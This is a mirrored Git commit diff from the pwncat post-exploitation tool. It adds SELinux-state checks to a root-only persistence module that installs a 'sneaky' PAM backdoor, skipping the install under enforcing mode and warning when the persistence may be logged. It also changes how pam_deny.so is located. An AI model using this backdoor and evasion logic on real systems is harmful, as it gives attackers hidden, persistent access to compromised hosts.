1
0
mirror of https://github.com/calebstewart/pwncat.git synced 2024-11-23 17:15:38 +01:00

Merge branch 'master' into new-logging

This commit is contained in:
Caleb Stewart 2020-07-02 09:49:42 -04:00
commit 40bfd7cb20
3 changed files with 35 additions and 12 deletions

View File

@ -28,6 +28,14 @@ class SELinuxState(FactData):
result += f"{Fore.YELLOW}{self.state}{Fore.RESET}"
return result
@property
def mode(self) -> str:
return self.status.get("Current mode", "unknown").lower()
@property
def enabled(self) -> bool:
return self.state.lower() == "enabled"
@property
def description(self):
width = max(len(x) for x in self.status) + 1

View File

@ -9,7 +9,7 @@ from typing import Optional
import pwncat
from pwncat import util
from pwncat.persist import PersistenceMethod, PersistenceError
from pwncat.util import Access, CompilationError
from pwncat.util import Access, CompilationError, console
class Method(PersistenceMethod):
@ -37,6 +37,21 @@ class Method(PersistenceMethod):
if pwncat.victim.current_user.id != 0:
raise PersistenceError("must be root")
try:
# Enumerate SELinux state
selinux = pwncat.victim.enumerate.first("system.selinux").data
# If enabled and enforced, it will block this from working
if selinux.enabled and "enforc" in selinux.mode:
raise PersistenceError("selinux is currently in enforce mode")
elif selinux.enabled:
# If enabled but permissive, it will log this module
console.log(
"[yellow]warning[/yellow]: selinux is enabled; persistence may be logged"
)
except ValueError:
# SELinux not found
pass
# Source to our module
sneaky_source = textwrap.dedent(
"""
@ -195,17 +210,17 @@ Z3YpewogICAgIHJldHVybiBQQU1fSUdOT1JFOwp9Cg==
# Locate the pam_deny.so to know where to place the new module
pam_modules = "/usr/lib/security"
try:
results = (
pwncat.victim.env(["find", "/", "-name", "pam_deny.so"])
pwncat.victim.run(
"find / -name pam_deny.so 2>/dev/null | grep -v 'snap/'"
)
.strip()
.decode("utf-8")
)
if results != "":
results = results.split("\n")
pam_modules = os.path.dirname(results[0])
except FileNotFoundError:
pass
# Ensure the directory exists and is writable
access = pwncat.victim.access(pam_modules)

View File

@ -30,7 +30,7 @@ dependency_links = [
# Setup
setup(
name="pwncat",
version="0.1",
version="0.2.0",
description="A fancy reverse and bind shell handler",
author="Caleb Stewart",
url="https://gitlab.com/calebstewart/pwncat",